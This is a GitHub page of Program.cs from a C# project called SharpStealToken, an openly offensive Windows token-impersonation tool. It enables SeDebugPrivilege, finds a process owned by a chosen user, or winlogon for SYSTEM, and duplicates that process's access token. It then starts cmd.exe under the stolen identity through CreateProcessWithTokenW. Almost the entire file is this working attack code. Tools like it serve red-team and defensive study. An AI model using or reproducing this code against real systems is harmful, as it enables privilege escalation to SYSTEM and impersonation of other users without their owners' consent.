-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathProgram.cs
210 lines (176 loc) · 7.16 KB
/
Program.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
using System;
using System.Diagnostics;
using System.Security.Principal;
using System.Management;
using System.Runtime.InteropServices;
using static SharpStealToken.Class1;
namespace SharpStealToken
{
public class Program
{
static bool IsRunningAsAdministrator()
{
WindowsIdentity identity = WindowsIdentity.GetCurrent();
WindowsPrincipal principal = new WindowsPrincipal(identity);
return principal.IsInRole(WindowsBuiltInRole.Administrator);
}
static string GetOwner(int processId)
{
string query = $"SELECT * FROM Win32_Process WHERE ProcessId = {processId}";
using (ManagementObjectSearcher searcher = new ManagementObjectSearcher(query))
using (ManagementObjectCollection results = searcher.Get())
{
foreach (ManagementObject mo in results)
{
object[] outParameters = new object[2];
mo.InvokeMethod("GetOwner", outParameters);
return $"{outParameters[0]}";
}
}
return null;
}
static int GetProcessIdByUser(string userName)
{
var query = $"SELECT ProcessId FROM Win32_Process WHERE Name LIKE '%'";
var searcher = new ManagementObjectSearcher(query);
foreach (ManagementObject obj in searcher.Get())
{
int processId = Convert.ToInt32(obj["ProcessId"]);
//Process process = Process.GetProcessById(processId);
string owner = GetOwner(processId);
if (owner == userName)
{
return processId;
}
}
return -1;
}
public static bool EnableWindowsPrivilege(string privilege)
{
LUID luid;
if (!LookupPrivilegeValue(null, privilege, out luid))
{
Console.WriteLine("Failed to lookup privilege value.");
return false;
}
IntPtr currentProcess = GetCurrentProcess();
IntPtr currentToken;
if (!OpenProcessToken(currentProcess, (uint)TokenAccess.TOKEN_ALL_ACCESS, out currentToken))
{
Console.WriteLine("Failed to open process token.");
return false;
}
TOKEN_PRIVILEGES tp = new TOKEN_PRIVILEGES
{
PrivilegeCount = 1,
Privileges = new LUID_AND_ATTRIBUTES[1]
};
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (!AdjustTokenPrivileges(currentToken, false, ref tp, (uint)Marshal.SizeOf(tp), IntPtr.Zero, IntPtr.Zero))
{
Console.WriteLine("Failed to adjust token privileges.");
return false;
}
PRIVILEGE_SET privs = new PRIVILEGE_SET
{
PrivilegeCount = 1,
Control = PRIVILEGE_SET.PRIVILEGE_SET_ALL_NECESSARY,
Privilege = new LUID_AND_ATTRIBUTES[1]
};
privs.Privilege[0].Luid = luid;
privs.Privilege[0].Attributes = SE_PRIVILEGE_ENABLED;
bool bResult;
if (!PrivilegeCheck(currentToken, ref privs, out bResult))
{
Console.WriteLine("Failed to check privilege.");
return false;
}
return bResult;
}
static void StealToken(int processId)
{
var process = Process.GetProcessById(processId);
var hToken = IntPtr.Zero;
var hTokenDup = IntPtr.Zero;
var sa = new SECURITY_ATTRIBUTES();
var si = new STARTUPINFO();
string cmd = @"C:\Windows\System32\cmd.exe";
try
{
// open handle to token
if (!OpenProcessToken(process.Handle, (uint)DesiredAccess.TOKEN_DUPLICATE | (uint)DesiredAccess.TOKEN_ASSIGN_PRIMARY | (uint)DesiredAccess.TOKEN_QUERY, out hToken))
{
Console.Error.WriteLine($"+ failed to open process token: {Marshal.GetLastWin32Error()}");
return;
}
// duplicate token
if (!DuplicateTokenEx(hToken, TokenAccess.TOKEN_ALL_ACCESS, ref sa,
SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,
TOKEN_TYPE.TokenImpersonation, out hTokenDup))
{
Console.Error.WriteLine($"+ failed to duplicate token: {Marshal.GetLastWin32Error()}");
return;
}
// impersonate token
if (CreateProcessWithTokenW(hTokenDup, 0x00000002, null, cmd, 0x00000010, IntPtr.Zero, null, ref si, out PROCESS_INFORMATION pi))
{
var identity = new WindowsIdentity(hTokenDup);
Console.WriteLine($"+ successfully impersonate {identity.Name}");
return;
}
Console.Error.WriteLine($"+ failed to impersonate token: {Marshal.GetLastWin32Error()}");
return;
}
catch
{
}
finally
{
// close token handles
if (hToken != IntPtr.Zero) CloseHandle(hToken);
if (hTokenDup != IntPtr.Zero) CloseHandle(hTokenDup);
process.Dispose();
}
Console.Error.WriteLine($"+ unknown error: {Marshal.GetLastWin32Error()}");
return;
}
static void Main(string[] args)
{
Console.WriteLine($" --++ R3dw0lv3s ++--");
Console.WriteLine($" --++ SharpStealToken ++--\n");
if (args.Length < 1)
{
Console.WriteLine("+ use: SharpStealToken.exe \"johndoe\" or SharpStealToken.exe \"SYSTEM\"");
return;
}
if (!IsRunningAsAdministrator())
{
Console.WriteLine("+ necessary admin privs");
return;
}
Console.WriteLine($"+ current process as: {WindowsIdentity.GetCurrent().Name}");
if (!EnableWindowsPrivilege("SeDebugPrivilege"))
{
Console.WriteLine($"+ error adjusting priv {Marshal.GetLastWin32Error()}");
return;
}
Console.WriteLine($"+ SeDebugPrivilege enable");
string userName = args[0];
if (userName == "SYSTEM")
{
Process winLogon = Process.GetProcessesByName("winlogon")[0];
StealToken(winLogon.Id);
}
else
{
int processId = GetProcessIdByUser(userName);
if (processId != -1)
{
Console.WriteLine($"+ processId for {userName} found: {processId}");
StealToken(processId);
}
}
}
}
}